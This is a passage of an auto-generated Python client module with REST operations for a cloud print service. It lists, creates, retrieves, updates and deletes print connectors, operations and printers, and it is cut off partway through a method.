from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, List, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PrintOperations(object):
"""PrintOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~devices_cloud_print.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
    def list_connectors(
        self,
        orderby=None,  # type: Optional[List[Union[str, "models.Get5ItemsItem"]]]
        select=None,  # type: Optional[List[Union[str, "models.Get6ItemsItem"]]]
        expand=None,  # type: Optional[List[str]]
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["models.CollectionOfPrintConnector"]
        """Get connectors from print.

        Returns a lazy pager over the printConnector collection; each page is
        fetched from the service on demand as the iterator is consumed.

        :param orderby: Order items by property values.
        :type orderby: list[str or ~devices_cloud_print.models.Get5ItemsItem]
        :param select: Select properties to be returned.
        :type select: list[str or ~devices_cloud_print.models.Get6ItemsItem]
        :param expand: Expand related entities.
        :type expand: list[str]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either CollectionOfPrintConnector or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrintConnector]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.CollectionOfPrintConnector"]
        # Map well-known HTTP failure codes onto typed azure-core exceptions;
        # callers may extend/override the mapping via the 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"
        def prepare_request(next_link=None):
            # Build the GET request for one page: the first page targets the
            # operation URL with all OData query options; follow-up pages hit
            # the server-supplied next_link, which already embeds the query.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list_connectors.metadata['url']  # type: ignore
                # Construct parameters ($top/$skip/$search/$filter/$count come
                # from the shared client configuration, not per-call arguments).
                query_parameters = {}  # type: Dict[str, Any]
                if self._config.top is not None:
                    query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
                if self._config.skip is not None:
                    query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
                if self._config.search is not None:
                    query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
                if self._config.filter is not None:
                    query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
                if self._config.count is not None:
                    query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
                if orderby is not None:
                    query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
                if select is not None:
                    query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
                if expand is not None:
                    query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            # ItemPaged contract: return (continuation token, iterator of items).
            deserialized = self._deserialize('CollectionOfPrintConnector', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.odata_next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch one page and fail fast on any non-200 status.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                error = self._deserialize(models.OdataError, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list_connectors.metadata = {'url': '/print/connectors'}  # type: ignore
def create_connectors(
self,
body, # type: "models.MicrosoftGraphPrintConnector"
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrintConnector"
"""Create new navigation property to connectors for print.
Create new navigation property to connectors for print.
:param body: New navigation property.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrintConnector
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrintConnector, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrintConnector
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrintConnector"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_connectors.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrintConnector')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrintConnector', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_connectors.metadata = {'url': '/print/connectors'} # type: ignore
    def get_connectors(
        self,
        print_connector_id, # type: str
        select=None, # type: Optional[List[Union[str, "models.Enum28"]]]
        expand=None, # type: Optional[List[str]]
        **kwargs # type: Any
    ):
        # type: (...) -> "models.MicrosoftGraphPrintConnector"
        """Get connectors from print.

        Retrieve a single printConnector entity by key, optionally trimming
        ($select) or expanding ($expand) the returned properties.

        :param print_connector_id: key: id of printConnector.
        :type print_connector_id: str
        :param select: Select properties to be returned.
        :type select: list[str or ~devices_cloud_print.models.Enum28]
        :param expand: Expand related entities.
        :type expand: list[str]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: MicrosoftGraphPrintConnector, or the result of cls(response)
        :rtype: ~devices_cloud_print.models.MicrosoftGraphPrintConnector
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrintConnector"]
        # Map well-known HTTP failure codes onto typed azure-core exceptions.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"
        # Construct URL: substitute the serialized entity key into the template.
        url = self.get_connectors.metadata['url']  # type: ignore
        path_format_arguments = {
            'printConnector-id': self._serialize.url("print_connector_id", print_connector_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters: OData options are comma-joined lists when given.
        query_parameters = {}  # type: Dict[str, Any]
        if select is not None:
            query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
        if expand is not None:
            query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            # Raise a mapped typed exception when possible, otherwise a generic
            # HttpResponseError carrying the deserialized OData error payload.
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.OdataError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('MicrosoftGraphPrintConnector', pipeline_response)
        if cls:
            # Caller hook receives the raw response, the model, and response headers.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get_connectors.metadata = {'url': '/print/connectors/{printConnector-id}'}  # type: ignore
def update_connectors(
self,
print_connector_id, # type: str
body, # type: "models.MicrosoftGraphPrintConnector"
**kwargs # type: Any
):
# type: (...) -> None
"""Update the navigation property connectors in print.
Update the navigation property connectors in print.
:param print_connector_id: key: id of printConnector.
:type print_connector_id: str
:param body: New navigation property values.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrintConnector
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_connectors.metadata['url'] # type: ignore
path_format_arguments = {
'printConnector-id': self._serialize.url("print_connector_id", print_connector_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrintConnector')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update_connectors.metadata = {'url': '/print/connectors/{printConnector-id}'} # type: ignore
def delete_connectors(
self,
print_connector_id, # type: str
if_match=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete navigation property connectors for print.
Delete navigation property connectors for print.
:param print_connector_id: key: id of printConnector.
:type print_connector_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_connectors.metadata['url'] # type: ignore
path_format_arguments = {
'printConnector-id': self._serialize.url("print_connector_id", print_connector_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_connectors.metadata = {'url': '/print/connectors/{printConnector-id}'} # type: ignore
    def list_operations(
        self,
        orderby=None,  # type: Optional[List[Union[str, "models.Enum29"]]]
        select=None,  # type: Optional[List[Union[str, "models.Enum30"]]]
        expand=None,  # type: Optional[List[str]]
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["models.CollectionOfPrintOperation"]
        """Get operations from print.

        Returns a lazy pager over the printOperation collection; each page is
        fetched from the service on demand as the iterator is consumed.

        :param orderby: Order items by property values.
        :type orderby: list[str or ~devices_cloud_print.models.Enum29]
        :param select: Select properties to be returned.
        :type select: list[str or ~devices_cloud_print.models.Enum30]
        :param expand: Expand related entities.
        :type expand: list[str]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either CollectionOfPrintOperation or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrintOperation]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.CollectionOfPrintOperation"]
        # Map well-known HTTP failure codes onto typed azure-core exceptions.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"
        def prepare_request(next_link=None):
            # First page: operation URL plus all OData query options.
            # Later pages: the server-supplied next_link, used verbatim.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list_operations.metadata['url']  # type: ignore
                # Construct parameters ($top/$skip/$search/$filter/$count come
                # from the shared client configuration, not per-call arguments).
                query_parameters = {}  # type: Dict[str, Any]
                if self._config.top is not None:
                    query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
                if self._config.skip is not None:
                    query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
                if self._config.search is not None:
                    query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
                if self._config.filter is not None:
                    query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
                if self._config.count is not None:
                    query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
                if orderby is not None:
                    query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
                if select is not None:
                    query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
                if expand is not None:
                    query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            # ItemPaged contract: return (continuation token, iterator of items).
            deserialized = self._deserialize('CollectionOfPrintOperation', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.odata_next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch one page and fail fast on any non-200 status.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                error = self._deserialize(models.OdataError, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list_operations.metadata = {'url': '/print/operations'}  # type: ignore
    def create_operations(
        self,
        body, # type: "models.MicrosoftGraphPrintOperation"
        **kwargs # type: Any
    ):
        # type: (...) -> "models.MicrosoftGraphPrintOperation"
        """Create new navigation property to operations for print.

        POSTs the serialized model to the operations collection and returns the
        entity the service created.

        :param body: New navigation property.
        :type body: ~devices_cloud_print.models.MicrosoftGraphPrintOperation
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: MicrosoftGraphPrintOperation, or the result of cls(response)
        :rtype: ~devices_cloud_print.models.MicrosoftGraphPrintOperation
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrintOperation"]
        # Map well-known HTTP failure codes onto typed azure-core exceptions.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self.create_operations.metadata['url']  # type: ignore
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # Serialize the model as the POST payload.
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(body, 'MicrosoftGraphPrintOperation')
        body_content_kwargs['content'] = body_content
        request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # Creation must answer 201 Created; anything else is surfaced as an error.
        if response.status_code not in [201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.OdataError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('MicrosoftGraphPrintOperation', pipeline_response)
        if cls:
            # Caller hook receives the raw response, the model, and response headers.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    create_operations.metadata = {'url': '/print/operations'}  # type: ignore
def get_operations(
self,
print_operation_id, # type: str
select=None, # type: Optional[List[Union[str, "models.Enum31"]]]
expand=None, # type: Optional[List[str]]
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrintOperation"
"""Get operations from print.
Get operations from print.
:param print_operation_id: key: id of printOperation.
:type print_operation_id: str
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum31]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrintOperation, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrintOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrintOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_operations.metadata['url'] # type: ignore
path_format_arguments = {
'printOperation-id': self._serialize.url("print_operation_id", print_operation_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrintOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_operations.metadata = {'url': '/print/operations/{printOperation-id}'} # type: ignore
    def update_operations(
        self,
        print_operation_id, # type: str
        body, # type: "models.MicrosoftGraphPrintOperation"
        **kwargs # type: Any
    ):
        # type: (...) -> None
        """Update the navigation property operations in print.

        Issues a PATCH against a single printOperation entity; a successful
        update returns no body.

        :param print_operation_id: key: id of printOperation.
        :type print_operation_id: str
        :param body: New navigation property values.
        :type body: ~devices_cloud_print.models.MicrosoftGraphPrintOperation
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        # Map well-known HTTP failure codes onto typed azure-core exceptions.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL: substitute the serialized entity key into the template.
        url = self.update_operations.metadata['url']  # type: ignore
        path_format_arguments = {
            'printOperation-id': self._serialize.url("print_operation_id", print_operation_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # Serialize the model as the PATCH payload.
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(body, 'MicrosoftGraphPrintOperation')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # A successful update returns 204 No Content (nothing to deserialize).
        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.OdataError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        if cls:
            return cls(pipeline_response, None, {})
    update_operations.metadata = {'url': '/print/operations/{printOperation-id}'}  # type: ignore
def delete_operations(
self,
print_operation_id, # type: str
if_match=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete navigation property operations for print.
Delete navigation property operations for print.
:param print_operation_id: key: id of printOperation.
:type print_operation_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_operations.metadata['url'] # type: ignore
path_format_arguments = {
'printOperation-id': self._serialize.url("print_operation_id", print_operation_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_operations.metadata = {'url': '/print/operations/{printOperation-id}'} # type: ignore
    def list_printers(
        self,
        orderby=None,  # type: Optional[List[Union[str, "models.Enum32"]]]
        select=None,  # type: Optional[List[Union[str, "models.Enum33"]]]
        expand=None,  # type: Optional[List[Union[str, "models.Enum34"]]]
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["models.CollectionOfPrinter"]
        """Get printers from print.

        Returns a lazy pager over the printer collection; each page is fetched
        from the service on demand as the iterator is consumed.

        :param orderby: Order items by property values.
        :type orderby: list[str or ~devices_cloud_print.models.Enum32]
        :param select: Select properties to be returned.
        :type select: list[str or ~devices_cloud_print.models.Enum33]
        :param expand: Expand related entities.
        :type expand: list[str or ~devices_cloud_print.models.Enum34]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either CollectionOfPrinter or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrinter]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.CollectionOfPrinter"]
        # Map well-known HTTP failure codes onto typed azure-core exceptions.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"
        def prepare_request(next_link=None):
            # First page: operation URL plus all OData query options.
            # Later pages: the server-supplied next_link, used verbatim.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list_printers.metadata['url']  # type: ignore
                # Construct parameters ($top/$skip/$search/$filter/$count come
                # from the shared client configuration, not per-call arguments).
                query_parameters = {}  # type: Dict[str, Any]
                if self._config.top is not None:
                    query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
                if self._config.skip is not None:
                    query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
                if self._config.search is not None:
                    query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
                if self._config.filter is not None:
                    query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
                if self._config.count is not None:
                    query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
                if orderby is not None:
                    query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
                if select is not None:
                    query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
                if expand is not None:
                    query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            # ItemPaged contract: return (continuation token, iterator of items).
            deserialized = self._deserialize('CollectionOfPrinter', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.odata_next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch one page and fail fast on any non-200 status.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                error = self._deserialize(models.OdataError, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list_printers.metadata = {'url': '/print/printers'}  # type: ignore
def create_printers(
    self,
    body,  # type: "models.MicrosoftGraphPrinter"
    **kwargs  # type: Any
):
    # type: (...) -> "models.MicrosoftGraphPrinter"
    """Create new navigation property to printers for print.

    POSTs the supplied printer entity to the collection and returns the
    server's view of the created entity.

    :param body: New navigation property.
    :type body: ~devices_cloud_print.models.MicrosoftGraphPrinter
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphPrinter, or the result of cls(response)
    :rtype: ~devices_cloud_print.models.MicrosoftGraphPrinter
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrinter"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Collection URL has no path parameters to substitute.
    url = self.create_printers.metadata['url']  # type: ignore
    query_parameters = {}  # type: Dict[str, Any]
    header_parameters = {
        'Content-Type': self._serialize.header("content_type", content_type, 'str'),
        'Accept': self._serialize.header("accept", accept, 'str'),
    }  # type: Dict[str, Any]

    # Serialize the payload and issue the POST through the pipeline.
    body_content_kwargs = {'content': self._serialize.body(body, 'MicrosoftGraphPrinter')}  # type: Dict[str, Any]
    request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphPrinter', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
create_printers.metadata = {'url': '/print/printers'}  # type: ignore
def get_printers(
    self,
    printer_id,  # type: str
    select=None,  # type: Optional[List[Union[str, "models.Enum35"]]]
    expand=None,  # type: Optional[List[Union[str, "models.Enum36"]]]
    **kwargs  # type: Any
):
    # type: (...) -> "models.MicrosoftGraphPrinter"
    """Get printers from print.

    Fetches a single printer by its key, optionally narrowing the returned
    properties with ``$select`` and expanding related entities with ``$expand``.

    :param printer_id: key: id of printer.
    :type printer_id: str
    :param select: Select properties to be returned.
    :type select: list[str or ~devices_cloud_print.models.Enum35]
    :param expand: Expand related entities.
    :type expand: list[str or ~devices_cloud_print.models.Enum36]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphPrinter, or the result of cls(response)
    :rtype: ~devices_cloud_print.models.MicrosoftGraphPrinter
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrinter"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Resolve the URL template with the entity key.
    url = self._client.format_url(
        self.get_printers.metadata['url'],  # type: ignore
        **{'printer-id': self._serialize.url("printer_id", printer_id, 'str')}
    )

    # OData query options are sent only when explicitly requested.
    query_parameters = {}  # type: Dict[str, Any]
